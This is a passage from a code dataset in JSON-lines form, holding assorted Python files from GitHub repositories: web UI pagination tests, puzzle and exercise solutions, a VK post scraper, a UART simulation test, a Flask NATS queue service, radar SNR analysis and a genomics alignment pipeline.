страницу не произошел, товары совпадают\")\n goods = db_link.warehouse.get_wares_by_id_and_moderation_state(str_ids, '1,2')\n next_page = current_page + 1\n if remaining_pages != 0:\n self.assertEqual(goods_on_page, len(goods), e_msg)\n Navigate.element_click(driver, Navigate.click_search.PAG_PAGE % next_page)\n else:\n self.assertEqual(count-count_on_pages, len(goods), e_msg)\n count_on_pages += len(goods)\n obj_s = str_ids\n current_page += 1\n remaining_pages -= 1\n self.assertEqual(count, count_on_pages, e_msg)\n\n def user_state_pagination(self, driver, count, db_link, users_on_page=40, e_msg=''):\n \"\"\"\n Проверка что пользователи только активные продавцы\n :param driver:\n :param count:\n :param goods_on_page:\n :param e_msg:\n :return:\n \"\"\"\n current_page = 1\n all_pages = int(math.ceil(int(count) / (users_on_page + 0.0)))\n remaining_pages = all_pages - current_page\n count_on_pages = 0\n obj_s = ''\n while remaining_pages >= 0:\n str_ids = self.get_user_ids(driver)\n self.assertNotEqual(obj_s, str_ids, \"Переход на след. страницу не произошел, пользователи совпадают\")\n users = db_link.accounting.get_users_by_id_and_permissions(str_ids, '2,6', '3,4,7,8')\n next_page = current_page + 1\n if remaining_pages != 0:\n self.assertEqual(users_on_page, len(users), e_msg)\n Navigate.element_click(driver, Navigate.click_search.PAG_PAGE % next_page)\n else:\n self.assertEqual(count-count_on_pages, len(users), e_msg)\n count_on_pages += len(users)\n obj_s = str_ids\n current_page += 1\n remaining_pages -= 1\n self.assertEqual(count, count_on_pages, e_msg)\n\n def user_card_in_search(self, driver, user):\n \"\"\"\n Метод проверяет карточку пользователя на странице поиска\n :param driver:\n :param user:\n \"\"\"\n pass\n","repo_name":"Maksim1988/test","sub_path":"tests/front_office/search/classes/class_search.py","file_name":"class_search.py","file_ext":"py","file_size_in_byte":15597,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"5342004849","text":"rules = {}\nrules_p = {}\nn = 0\nfor line in open('input.txt'):\n n += 1\n ix = line.strip().index('contain')\n parent = line[0:ix].strip().replace('bags', '').strip()\n children = line[ix+len('contain'):].strip()\n children = children.split(',')\n children = [c.replace('bags', '').replace('bag', '').replace('.', '').replace('no', '0').strip() for c in children]\n children = [(int(c.split(' ')[0]), ' '.join(c.split(' ')[1:])) for c in children]\n if parent in rules:\n print('parent already in rules')\n print(rules[parent])\n rules[parent] = children\n for c in children:\n if c[0] != 0:\n rules_p.setdefault(c[1], [])\n rules_p[c[1]].append(parent)\n\n# Task one -----------------------\nmy_bag = 'shiny gold'\nres = []\ndef find_col(col):\n global res\n if col in rules_p:\n for col in rules_p[col]:\n find_col(col)\n res.append(col)\n \nfind_col(my_bag)\ncolors = set(res)\nprint('Nb colors : ', len(colors))\n\n# Task tow ----------------------------\ncounts = 0\ndef count_col(col):\n global counts\n if col in rules:\n c = 0\n for n, new_col in rules[col]:\n c += n + n*count_col(new_col)\n return c\n return 0\n\ncounts = count_col(my_bag)\nprint('Nb : ', counts)\n\n\n","repo_name":"sebastien-lemieux/advent","sub_path":"2020/day07/gb_day07.py","file_name":"gb_day07.py","file_ext":"py","file_size_in_byte":1288,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"38399412161","text":"import csv\nimport time\nimport 
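# In find_col above the loop reuses `col` as its iteration variable, so the
# trailing res.append(col) records the *last parent iterated* rather than the
# bag being visited -- a container that itself has containers can be dropped
# (e.g. gold inside A and B, A inside X: A is never appended). A sketch that
# avoids the shadowing, plus a memoized version of count_col:
from functools import lru_cache

def ancestors(color, rules_p, seen=None):
    seen = set() if seen is None else seen
    for parent in rules_p.get(color, []):
        if parent not in seen:
            seen.add(parent)
            ancestors(parent, rules_p, seen)
    return seen

def make_counter(rules):
    # rules maps color -> [(n, inner_color), ...] as parsed above
    @lru_cache(maxsize=None)
    def count(color):
        return sum(n + n * count(inner) for n, inner in rules.get(color, []))
    return count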
requests\n\ndef take_x_posts(x):\n\t'''Parses x posts from the VK group wall.'''\n\ttoken = 'dGFrZSB5b3VyIGhhbmRzIG9mZg=='\n\tversion = 5.131\n\tdomain = 'domain' # vk.com/domain\n\tcount = 100\n\toffset = 0\n\tall_posts = []\n\twhile offset < count:\n\t\tresponse = requests.get('https://api.vk.com/method/wall.get',\n\t\t\t\t\t\t\t\tparams={\n\t\t\t\t\t\t\t\t\t'access_token': token,\n\t\t\t\t\t\t\t\t\t'v': version,\n\t\t\t\t\t\t\t\t\t'domain': domain,\n\t\t\t\t\t\t\t\t\t'count': count,\n\t\t\t\t\t\t\t\t\t'offset': offset\n\t\t\t\t\t\t\t\t})\n\n\t\tdata = response.json()['response']['items']\n\t\toffset += 101\n\t\tall_posts.extend(data)\n\t\ttime.sleep(30)\n\treturn all_posts\n\nall_posts = take_x_posts(200)\n\ndef file_writer(all_posts):\n\twith open('eden_parsing.csv', 'w') as file:\n\t\ta_pen = csv.writer(file)\n\t\ta_pen.writerow(('~~~TEST~~~'))\n\t\tfor post in all_posts:\n\t\t\ta_pen.writerow((post['text']))\n","repo_name":"samaellovecraft/a-lil-bit-of-everything","sub_path":"python/vk-wall-parsing.py","file_name":"vk-wall-parsing.py","file_ext":"py","file_size_in_byte":835,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"5397946093","text":"budget = float(input())\nplace_scene = input()\nseason = input()\nnumber_days = int(input())\nday_shooting = 0\nif place_scene == \"Dubai\":\n if season == \"Winter\":\n day_shooting = 45000\n elif season == \"Summer\":\n day_shooting = 40000\nif place_scene == \"Sofia\":\n if season == \"Winter\":\n day_shooting = 17000\n elif season == \"Summer\":\n day_shooting = 12500\nif place_scene == \"London\":\n if season == \"Winter\":\n day_shooting = 24000\n elif season == \"Summer\":\n day_shooting = 20250\nfinal_sum = number_days * day_shooting\nif place_scene == \"Dubai\":\n final_sum *= 0.7\nelif place_scene == \"Sofia\":\n final_sum *= 1.25\ndiff = abs(budget - final_sum)\nif budget >= final_sum:\n print(f\"The budget for the movie is enough! We have {diff:.2f} leva left!\")\nelse:\n print(f\"The director needs {diff:.2f} leva more!\")\n","repo_name":"PetyoGD/MyFirstProject","sub_path":"exam_preparation/movie_desination.py","file_name":"movie_desination.py","file_ext":"py","file_size_in_byte":865,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"5996347350","text":"# Ask for enter the number from the use \nNumber = int(input(\"Enter the Number:\"))\n\n# Initiate value to null \nrev = 0\n\nwhile(Number>0):\n\n # Logic \n rem = Number%10\n rev = (rev * 10)+ rem\n Number = Number//10\n\n# Display the result \nprint(\"The Reverse Number is :{}\".format(rev))\n\n\n\n# for example\n# Reminder = number %10\n# Reminder = 12345%10 = 5\n# Reverse = Reverse *10 + Reminder Initial value of revs_number is null\n# Reverse = 0 * 10 + 5 = 0 + 5 = 5\n# Number = Number //10\n# Number = 1234 //10 = 1234 // Now loop will iterate on this number. 
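# take_x_posts above never pages past the first batch: the parameter x is
# unused, `while offset < count` compares against the fixed batch size, and
# `offset += 101` skips one post per 100-post batch. A corrected pagination
# sketch (fetch_batch is a hypothetical stand-in for the requests.get call):
def take_x_posts_fixed(x, fetch_batch):
    posts = []
    offset = 0
    while len(posts) < x:
        batch = fetch_batch(count=min(100, x - len(posts)), offset=offset)
        if not batch:
            break                     # wall exhausted before x posts
        posts.extend(batch)
        offset += len(batch)          # advance by what actually came back
    return posts[:x]

# Separately, csv.writerow(('~~~TEST~~~')) passes a plain string (parentheses
# alone do not make a tuple), so each character lands in its own column; a
# one-element tuple needs a trailing comma: ('~~~TEST~~~',).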
","repo_name":"malinisaran/python","sub_path":"reverse.py","file_name":"reverse.py","file_ext":"py","file_size_in_byte":560,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"17410232545","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nfrom hwt.hdl.constants import Time\nfrom hwt.simulator.simTestCase import SimTestCase\nfrom hwt.simulator.utils import valToInt\nfrom hwtLib.peripheral.uart.rx import UartRx\nfrom hwtSimApi.constants import CLK_PERIOD\nfrom pyMathBitPrecise.bit_utils import get_bit\n\n\nclass UartRxBasicTC(SimTestCase):\n\n @classmethod\n def setUpClass(cls):\n u = cls.u = UartRx()\n u.OVERSAMPLING = cls.OVERSAMPLING = 16\n u.FREQ = cls.FREQ = 115200 * cls.OVERSAMPLING\n u.BAUD = cls.BAUD = 115200\n cls.compileSim(u)\n\n def getStr(self):\n s = \"\"\n for d in self.u.dataOut._ag.data:\n ch = valToInt(d)\n s += chr(ch)\n\n return s\n\n def sendStr(self, string):\n START_BIT = 0\n STOP_BIT = 1\n\n rx = self.u.rxd._ag.data\n os = self.FREQ // self.BAUD\n for ch in string:\n rx.extend([START_BIT for _ in range(os)])\n for i in range(8):\n d = get_bit(ord(ch), i)\n rx.extend([d for _ in range(os)])\n rx.extend([STOP_BIT for _ in range(os)])\n\n def test_nop(self):\n self.u.rxd._ag.data.append(1)\n self.runSim(200 * Time.ns,)\n self.assertEqual(self.getStr(), \"\")\n\n def test_simple(self):\n t = \"simple\"\n self.sendStr(t)\n self.runSim(self.OVERSAMPLING *\n (self.FREQ // self.BAUD) * (len(t) + 5) * CLK_PERIOD)\n self.assertEqual(self.getStr(), t)\n\n\nclass UartRxTC(UartRxBasicTC):\n\n @classmethod\n def setUpClass(cls):\n cls.OVERSAMPLING = 16\n cls.FREQ = 115200 * cls.OVERSAMPLING * 4\n cls.BAUD = 115200\n\n u = cls.u = UartRx()\n u.BAUD = cls.BAUD\n u.FREQ = cls.FREQ\n u.OVERSAMPLING = cls.OVERSAMPLING\n cls.compileSim(u)\n\n\nif __name__ == \"__main__\":\n import unittest\n _ALL_TCs = [UartRxBasicTC, UartRxTC]\n testLoader = unittest.TestLoader()\n loadedTcs = [testLoader.loadTestsFromTestCase(tc) for tc in _ALL_TCs]\n suite = unittest.TestSuite(loadedTcs)\n runner = unittest.TextTestRunner(verbosity=3)\n runner.run(suite)\n","repo_name":"Nic30/hwtLib","sub_path":"hwtLib/peripheral/uart/rx_test.py","file_name":"rx_test.py","file_ext":"py","file_size_in_byte":2151,"program_lang":"python","lang":"en","doc_type":"code","stars":33,"dataset":"github-code","pt":"48"} +{"seq_id":"9004213891","text":"from typing import List, Dict\n\n\nclass NCR:\n factorials: List[int]\n mod: int\n mod_inverse_cache: Dict = {}\n\n def __init__(self, max, mod):\n self.max_factorial = max\n self.mod = mod\n self.factorials = [1] * (max + 1)\n temp = 1\n for i in range(1, max + 1):\n temp = (temp * i) % mod\n self.factorials[i] = temp\n\n def power(self, a, b):\n x = 1\n y = a\n while b > 0:\n if (b % 2) > 0:\n x = (x * y) % self.mod\n y = (y * y) % self.mod\n b = (b // 2)\n return x % self.mod\n\n def mod_inverse(self, a):\n if a in self.mod_inverse_cache:\n return self.mod_inverse_cache[a]\n self.mod_inverse_cache[a] = self.power(a, self.mod - 2)\n return self.mod_inverse_cache[a]\n\n def ncr(self, n, r):\n return (self.factorials[n] *\n (self.mod_inverse((self.factorials[r] * self.factorials[n - r]) % self.mod)) % self.mod) % self.mod\n\n\ntests = int(input())\n\nwhile tests > 0:\n myncr = NCR(100000, 1000000007)\n tests -= 1\n n = int(input())\n a = input()\n b = input()\n n1 = 0\n n2 = 0\n for c in a:\n if c == '1':\n n1 += 1\n\n for c in b:\n if c == '1':\n n2 += 1\n\n if n2 > n1:\n temp_n = n1\n n1 = n2\n n2 = temp_n\n\n 
min = n1 - n2\n\n if n1 + n2 > n:\n max = (2 * n) - (n1 + n2)\n else:\n max = n1 + n2\n\n ans = 0\n i = min\n while i <= max:\n ans = (ans + myncr.ncr(n, i)) % 1000000007\n i += 2\n\n print(ans)\n","repo_name":"adit-t/competitive-programming","sub_path":"codechef/long-challenges/2019/dec/binxor.py","file_name":"binxor.py","file_ext":"py","file_size_in_byte":1595,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"30202479274","text":"import asyncio\nimport json\nimport logging\nimport random\nimport string\n\nimport nest_asyncio # noqa: I001\nfrom flask import _app_ctx_stack\nfrom nats.aio.client import Client as NATS, DEFAULT_CONNECT_TIMEOUT # noqa N814; by convention the name is NATS\nfrom stan.aio.client import Client as STAN # noqa N814; by convention the name is STAN\n\n\nclass QueueService():\n \"\"\"Provides services to use the Queue from Flask.\n\n For ease of use, this follows the style of a Flask Extension\n \"\"\"\n\n def __init__(self, app=None, loop=None):\n \"\"\"Initialize, supports setting the app context on instantiation.\"\"\"\n # Default NATS Options\n self.name = 'default_api_client'\n self.nats_options = {}\n self.stan_options = {}\n self.loop = loop\n self.nats_servers = None\n self.subject = None\n\n self.logger = logging.getLogger()\n\n if app is not None:\n self.init_app(app, self.loop)\n\n def init_app(self, app, loop=None,\n nats_options=None, stan_options=None):\n \"\"\"Initialize the extension.\n\n :param app: Flask app\n :return: naked\n \"\"\"\n nest_asyncio.apply()\n self.name = app.config.get('NATS_CLIENT_NAME')\n self.loop = loop or asyncio.get_event_loop()\n self.nats_servers = app.config.get('NATS_SERVERS').split(',')\n self.subject = app.config.get('NATS_FILER_SUBJECT')\n\n default_nats_options = {\n 'name': self.name,\n 'io_loop': self.loop,\n 'servers': self.nats_servers,\n 'connect_timeout': app.config.get('NATS_CONNECT_TIMEOUT', DEFAULT_CONNECT_TIMEOUT),\n\n # NATS handlers\n 'error_cb': self.on_error,\n 'closed_cb': self.on_close,\n 'reconnected_cb': self.on_reconnect,\n 'disconnected_cb': self.on_disconnect,\n }\n if not nats_options:\n nats_options = {}\n\n self.nats_options = {**default_nats_options, **nats_options}\n\n default_stan_options = {\n 'cluster_id': app.config.get('NATS_CLUSTER_ID'),\n 'client_id':\n (self.name.\n lower().\n strip(string.whitespace)\n ).translate({ord(c): '_' for c in string.punctuation})\n + '_' + str(random.SystemRandom().getrandbits(0x58))\n }\n if not stan_options:\n stan_options = {}\n\n self.stan_options = {**default_stan_options, **stan_options}\n\n app.teardown_appcontext(self.teardown)\n\n def teardown(self, exception): # pylint: disable=unused-argument; flask method signature\n \"\"\"Destroy all objects created by this extension.\"\"\"\n try:\n this_loop = self.loop or asyncio.get_event_loop()\n this_loop.run_until_complete(self.close())\n except RuntimeError as e:\n self.logger.error(e)\n\n async def connect(self):\n \"\"\"Connect to the queueing service.\"\"\"\n ctx = _app_ctx_stack.top\n if ctx:\n if not hasattr(ctx, 'nats'):\n ctx.nats = NATS()\n ctx.stan = STAN()\n\n if not ctx.nats.is_connected:\n self.stan_options = {**self.stan_options, **{'nats': ctx.nats}}\n await ctx.nats.connect(**self.nats_options)\n await ctx.stan.connect(**self.stan_options)\n\n async def close(self):\n \"\"\"Close the connections to the queue.\"\"\"\n if self.nats and self.nats.is_connected:\n await self.stan.close()\n await self.nats.close()\n\n def 
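# The NCR class above leans on Fermat's little theorem: for prime p,
# a^(p-2) is the modular inverse of a (mod p), so
# nCr = n! * (r! * (n-r)!)^(p-2) mod p. The same identity, compactly, with
# Python's three-argument pow:
MOD = 10 ** 9 + 7

def ncr_mod(n, r, fact):
    # fact[i] = i! % MOD, precomputed once as in NCR.__init__
    if r < 0 or r > n:
        return 0
    denom = fact[r] * fact[n - r] % MOD
    return fact[n] * pow(denom, MOD - 2, MOD) % MOD

fact = [1] * 6
for i in range(1, 6):
    fact[i] = fact[i - 1] * i % MOD
assert ncr_mod(5, 2, fact) == 10   # C(5, 2) = 10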
publish_json(self, payload=None, subject=None):\n \"\"\"Publish the json payload to the Queue Service.\"\"\"\n try:\n subject = subject or self.subject\n self.loop.run_until_complete(self.async_publish_json(payload, subject))\n except Exception as err:\n self.logger.error('Error: %s', err)\n raise err\n\n async def publish_json_to_subject(self, payload=None, subject=None):\n \"\"\"Publish the json payload to the specified subject.\"\"\"\n try:\n await self.async_publish_json(payload, subject)\n except Exception as err:\n self.logger.error('Error: %s', err)\n raise err\n\n async def async_publish_json(self, payload=None, subject=None):\n \"\"\"Publish the json payload to the Queue Service.\"\"\"\n if not self.is_connected:\n await self.connect()\n\n await self.stan.publish(subject=subject,\n payload=json.dumps(payload).encode('utf-8'))\n\n async def on_error(self, e):\n \"\"\"Handle errors raised by the client library.\"\"\"\n self.logger.warning('Error: %s', e)\n\n async def on_reconnect(self):\n \"\"\"Invoke by the client library when attempting to reconnect to NATS.\"\"\"\n self.logger.warning('Reconnected to NATS at nats://%s', self.nats.connected_url.netloc if self.nats else 'none')\n\n async def on_disconnect(self):\n \"\"\"Invoke by the client library when disconnected from NATS.\"\"\"\n self.logger.warning('Disconnected from NATS')\n\n async def on_close(self):\n \"\"\"Invoke by the client library when the NATS connection is closed.\"\"\"\n self.logger.warning('Closed connection to NATS')\n\n @property\n def is_closed(self):\n \"\"\"Return True if the connection toThe cluster is closed.\"\"\"\n if self.nats:\n return self.nats.is_closed\n return True\n\n @property\n def is_connected(self):\n \"\"\"Return True if connected to the NATS cluster.\"\"\"\n if self.nats:\n return self.nats.is_connected\n return False\n\n @property\n def stan(self):\n \"\"\"Return the STAN client for the Queue Service.\"\"\"\n ctx = _app_ctx_stack.top\n if ctx:\n if not hasattr(ctx, 'stan'):\n return None\n return ctx.stan\n return None\n\n @property\n def nats(self):\n \"\"\"Return the NATS client for the Queue Service.\"\"\"\n ctx = _app_ctx_stack.top\n if ctx:\n if not hasattr(ctx, 'nats'):\n return None\n return ctx.nats\n return None\n","repo_name":"bcgov/lear","sub_path":"legal-api/src/legal_api/services/queue.py","file_name":"queue.py","file_ext":"py","file_size_in_byte":6157,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"48"} +{"seq_id":"41187963065","text":"# This is a sample Python script.\nimport sys\n\nfrom DatasetsOp import Datasets\nimport os\nimport pandas as pd\nfrom sklearn.svm import OneClassSVM\nimport matplotlib.pyplot as plt\nfrom numpy import where\nimport numpy as np\n#import cv2\nimport time\nimport math\n\n# Press Shift+F10 to execute it or replace it with your code.\n# Press Double Shift to search everywhere for classes, files, tool windows, actions, and settings.\n\n#np.set_printoptions(linewidth=600) #change setting of printing to the terminal\ndatSets = Datasets()\ndata = datSets.LoadDataset_specFrame(datSets.listLabMeas[7],0)\n\n#Create a scatter plot with colors based on the third value\n# plt.clf()\n# plt.xlim(-5,5)\n# plt.ylim(0,9)\n# b1 = plt.scatter(data[:,datSets.x],data[:,datSets.y],c=data[:,datSets.snr], cmap='viridis')\n# cbar = plt.colorbar()\n# #TCFAR =α×Np\n# plt.show()\n\n#Calculation hypotenuse of points for creation dependance of f(hypotenuse) = SNR\ndata_c = np.empty((data.shape[0], data.shape[1] + 1)) # Add one 
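# publish_json above bridges Flask's synchronous handlers to the async NATS
# client by driving a stored event loop with run_until_complete;
# nest_asyncio.apply() makes that legal even when a loop is already running.
# The pattern in isolation, with a stand-in coroutine instead of stan.publish
# (the subject name here is made up for the example):
import asyncio
import json
import nest_asyncio

nest_asyncio.apply()

async def fake_publish(subject, payload):        # stand-in for stan.publish
    await asyncio.sleep(0)
    return subject, json.dumps(payload).encode('utf-8')

def publish_sync(loop, subject, payload):
    return loop.run_until_complete(fake_publish(subject, payload))

loop = asyncio.new_event_loop()
print(publish_sync(loop, 'some.subject', {'filing': 1}))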
extra column\njdx = 0\nwhile jdx < data.shape[0]:\n calculated_value = math.sqrt(data[jdx,datSets.x]**2+data[jdx,datSets.y]**2)\n data_c[jdx,:-1] = data[jdx, :] #Copy existing data\n data_c[jdx,-1] = calculated_value\n jdx += 1\n\n #Sorting depending on sort_column_index\n#Column index by which you want to sort\nsort_column_index = 9\n# Get the indices that would sort the array based on the specified column\nsorted_indices = np.argsort(data_c[:, sort_column_index])\n# Use the sorted indices to rearrange the entire array\nsorted_data = data_c[sorted_indices]\n\nplt.clf()\nplt.plot(sorted_data[:,9],sorted_data[:,datSets.snr])\nplt.show()\n\nos.chdir(datSets.scriptPath)\nheader = \"frame,detObj,x,y,z,v,snr,noise,label,hypotenuse\"\nnp.savetxt('temp_data_hypotenuse.csv',data_c,delimiter=',', header=header)\n\nsnrTreshold = 120\ndata_underTreshold = []\ndata_aboveTreshold = []\nidx = 0\nprint(data.shape[0])\nprint(data.shape[1])\nwhile idx < data.shape[0]:\n if snrTreshold < data[idx,datSets.snr]:\n #data_aboveTreshold = np.row_stack((data_aboveTreshold,data[idx,:]))\n data_aboveTreshold.append(data[idx, :])\n else:\n #data_underTreshold = np.row_stack((data_underTreshold, data[idx, :]))\n data_underTreshold.append(data[idx, :])\n idx += 1\n\ndata_aboveTreshold = np.array(data_aboveTreshold)\ndata_underTreshold = np.array(data_underTreshold)\n\nprint(\"DAT\", data_aboveTreshold.shape[0])\nprint(\"DUT\", data_underTreshold.shape[0])\n\nplt.clf()\nb1 = plt.scatter(data_aboveTreshold[:,datSets.x],data_aboveTreshold[:,datSets.y],c='black')\nb2 = plt.scatter(data_underTreshold[:,datSets.x],data_underTreshold[:,datSets.y],c='red')\nplt.xlim(-5,5)\nplt.ylim(0,9)\nplt.legend([b1,b2],[\"ATh\",\"UTh\"])\nplt.show()\n\nos.chdir(datSets.scriptPath)\nprint(datSets.scriptPath)\nheader = \"frame,detObj,x,y,z,v,snr,noise,label\"\nnp.savetxt('temp_data.csv',data,delimiter=',', header=header)\n\n\n\n\n\n\n\n\n\n# See PyCharm help at https://www.jetbrains.com/help/pycharm/\n","repo_name":"libriIPcko/RadarData_MachineLearning","sub_path":"Statistical SC/CFAR treshold/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2944,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"26088716072","text":"#! 
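# The row-by-row while loops above (hypotenuse column, then SNR split) can be
# replaced with vectorized numpy; a sketch assuming the same column layout
# (datSets.x / datSets.y / datSets.snr are column indices) and threshold:
import numpy as np

def add_hypotenuse_and_split(data, x_col, y_col, snr_col, snr_threshold=120):
    hyp = np.hypot(data[:, x_col], data[:, y_col])    # sqrt(x^2 + y^2) per row
    data_c = np.column_stack([data, hyp])
    data_sorted = data_c[np.argsort(data_c[:, -1])]   # sort rows by hypotenuse
    above = data[data[:, snr_col] > snr_threshold]    # boolean-mask split
    under = data[data[:, snr_col] <= snr_threshold]
    return data_sorted, above, under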
/usr/bin/env python3\n\n\"\"\"Preprocessing (flexbar, bowtie2, STAR),\ncreate base genome profile.\n\n\"\"\"\n\nimport argparse\nimport logging\nimport os\nimport sys\n\nimport yaml\n\nimport pbio.ribo.ribo_filenames as filenames\n\nimport pbio.utils.bam_utils as bam_utils\nimport pbio.utils.fastx_utils as fastx_utils\nimport pbio.utils.pgrm_utils as pgrm_utils\nimport pbio.misc.logging_utils as logging_utils\nimport pbio.misc.shell_utils as shell_utils\nimport pbio.misc.utils as utils\n\nfrom rpbp.defaults import default_num_cpus, default_mem, star_executable, \\\n star_options, flexbar_options\n\nlogger = logging.getLogger(__name__)\n\n\ndef main():\n parser = argparse.ArgumentParser(formatter_class=argparse.ArgumentDefaultsHelpFormatter,\n description=\"Creates base genome profile.\")\n\n parser.add_argument('raw_data', help=\"The raw data file (fastq[.gz])\")\n\n parser.add_argument('config', help=\"The (yaml) configuration file\")\n\n parser.add_argument('name', help=\"The name for the dataset, used in the created files\")\n\n parser.add_argument('-p', '--num-cpus', help=\"The number of processors to use\",\n type=int, default=default_num_cpus)\n \n parser.add_argument('--mem', help=\"The amount of RAM to request\", default=default_mem)\n\n parser.add_argument('-t', '--tmp', help=\"\"\"The location for temporary files. If not\n specified, program-specific temp locations are used.\"\"\", default=None)\n\n parser.add_argument('--do-not-call', action='store_true')\n\n parser.add_argument('--overwrite', help=\"\"\"If this flag is present, existing files\n will be overwritten.\"\"\", action='store_true')\n\n parser.add_argument('-k', '--keep-intermediate-files', help=\"\"\"If this flag is given,\n then all intermediate files will be kept; otherwise, they will be\n deleted. This feature is implemented piecemeal. 
If the --do-not-call flag\n is given, then nothing will be deleted.\"\"\", action='store_true')\n\n logging_utils.add_logging_options(parser)\n pgrm_utils.add_star_options(parser, star_executable)\n pgrm_utils.add_flexbar_options(parser)\n args = parser.parse_args()\n logging_utils.update_logging(args)\n\n msg = \"[create-base-genome-profile]: {}\".format(' '.join(sys.argv))\n logger.info(msg)\n\n config = yaml.load(open(args.config), Loader=yaml.FullLoader)\n\n # check that all of the necessary programs are callable\n programs = [\n 'flexbar',\n args.star_executable,\n 'samtools',\n 'bowtie2',\n 'remove-multimapping-reads'\n ]\n shell_utils.check_programs_exist(programs)\n\n required_keys = [\n 'riboseq_data',\n 'ribosomal_index',\n 'gtf',\n 'genome_base_path',\n 'genome_name'\n ]\n utils.check_keys_exist(config, required_keys)\n\n note = config.get('note', None)\n call = not args.do_not_call\n keep_delete_files = args.keep_intermediate_files or args.do_not_call\n\n # Step 0: Running flexbar to remove adapter sequences\n\n raw_data = args.raw_data\n flexbar_target = filenames.get_without_adapters_base(config['riboseq_data'],\n args.name,\n note=note)\n without_adapters = filenames.get_without_adapters_fastq(config['riboseq_data'],\n args.name,\n note=note)\n\n adapter_seq_str = utils.get_config_argument(config, 'adapter_sequence', 'adapter-seq')\n adapter_file_str = utils.get_config_argument(config, 'adapter_file', 'adapters')\n\n # get all options, command line options override defaults\n flexbar_option_str = pgrm_utils.get_final_args(flexbar_options, args.flexbar_options)\n\n cmd = \"flexbar -r {} -t {} {} {} {} -n {}\".format(raw_data,\n flexbar_target,\n adapter_seq_str,\n adapter_file_str,\n flexbar_option_str,\n args.num_cpus)\n in_files = [raw_data]\n out_files = [without_adapters]\n file_checkers = {\n without_adapters: fastx_utils.check_fastq_file\n }\n shell_utils.call_if_not_exists(cmd, out_files, in_files=in_files,\n file_checkers=file_checkers, overwrite=args.overwrite, call=call)\n\n # Step 1: Running bowtie2 to remove rRNA alignments\n\n out = utils.abspath(\"dev\", \"null\") # we do not care about the alignments\n without_rrna = filenames.get_without_rrna_fastq(config['riboseq_data'],\n args.name,\n note=note)\n with_rrna = filenames.get_with_rrna_fastq(config['riboseq_data'],\n args.name,\n note=note)\n\n cmd = \"bowtie2 -p {} --very-fast -x {} -U {} -S {} --un-gz {} --al-gz {}\".format(\n args.num_cpus,\n config['ribosomal_index'],\n without_adapters,\n out,\n without_rrna,\n with_rrna)\n\n in_files = [without_adapters]\n in_files.extend(pgrm_utils.get_bowtie2_index_files(config['ribosomal_index']))\n out_files = [without_rrna, with_rrna]\n to_delete = [without_adapters]\n file_checkers = {\n without_rrna: fastx_utils.check_fastq_file\n }\n shell_utils.call_if_not_exists(cmd, out_files, in_files=in_files,\n file_checkers=file_checkers, overwrite=args.overwrite, call=call,\n keep_delete_files=keep_delete_files, to_delete=to_delete)\n\n # Step 2: Running STAR to align rRNA-depleted reads to genome\n\n star_output_prefix = filenames.get_riboseq_bam_base(config['riboseq_data'],\n args.name,\n note=note)\n genome_star_bam = \"{}{}\".format(star_output_prefix, \"Aligned.sortedByCoord.out.bam\")\n\n # get all options, command line options override defaults\n\n mem_bytes = utils.human2bytes(args.mem)\n star_options['limitBAMsortRAM'] = mem_bytes\n\n if args.tmp is not None:\n star_tmp_name = str(args.name + \"_STARtmp\")\n star_tmp_dir = pgrm_utils.create_star_tmp(args.tmp, 
star_tmp_name)\n star_options['outTmpDir'] = star_tmp_dir\n\n star_option_str = pgrm_utils.get_final_args(star_options, args.star_options)\n\n # If GFF3 specs, then we need to inform STAR.\n # Whether we have de novo or not, the format of \"config['gtf']\" has precedence.\n sjdb_gtf_tag_str = \"\"\n use_gff3_specs = config['gtf'].endswith('gff')\n gtf_file = filenames.get_gtf(config['genome_base_path'],\n config['genome_name'],\n is_gff3=use_gff3_specs,\n is_star_input=True)\n if use_gff3_specs:\n sjdb_gtf_tag_str = \"--sjdbGTFtagExonParentTranscript Parent\"\n\n cmd = (\"{} --runThreadN {} --genomeDir {} --sjdbGTFfile {} {} --readFilesIn {} \"\n \"{} --outFileNamePrefix {}\".format(args.star_executable,\n args.num_cpus,\n config['star_index'],\n gtf_file,\n sjdb_gtf_tag_str,\n without_rrna,\n star_option_str,\n star_output_prefix))\n in_files = [without_rrna]\n in_files.extend(pgrm_utils.get_star_index_files(config['star_index']))\n to_delete = [without_rrna]\n out_files = [genome_star_bam]\n file_checkers = {\n genome_star_bam: bam_utils.check_bam_file\n }\n shell_utils.call_if_not_exists(cmd, out_files, in_files=in_files,\n file_checkers=file_checkers, overwrite=args.overwrite,\n call=call, keep_delete_files=keep_delete_files, to_delete=to_delete)\n \n # now, we need to symlink the (genome) STAR output to that expected by the rest of the pipeline\n genome_sorted_bam = filenames.get_riboseq_bam(config['riboseq_data'],\n args.name,\n note=note)\n\n if os.path.exists(genome_star_bam):\n shell_utils.create_symlink(genome_star_bam, genome_sorted_bam, call)\n else:\n msg = (\"Could not find the STAR genome bam alignment file. Unless \"\n \"--do-not-call was given, this is a problem.\")\n logger.warning(msg)\n\n # create the bamtools index\n cmd = \"samtools index -b {}\".format(genome_sorted_bam)\n shell_utils.check_call(cmd, call=call)\n\n # check if we want to keep multimappers\n if 'keep_riboseq_multimappers' in config:\n return\n\n # remove multimapping reads from the genome file\n tmp_str = \"\"\n if args.tmp is not None:\n tmp_str = \"--tmp {}\".format(args.tmp)\n\n unique_genome_filename = filenames.get_riboseq_bam(config['riboseq_data'],\n args.name,\n is_unique=True,\n note=note)\n\n cmd = \"remove-multimapping-reads {} {} {}\".format(genome_sorted_bam, \n unique_genome_filename,\n tmp_str)\n\n in_files = [genome_sorted_bam]\n out_files = [unique_genome_filename]\n to_delete = [genome_star_bam, genome_sorted_bam]\n file_checkers = {\n unique_genome_filename: bam_utils.check_bam_file\n }\n shell_utils.call_if_not_exists(cmd, out_files, in_files=in_files,\n 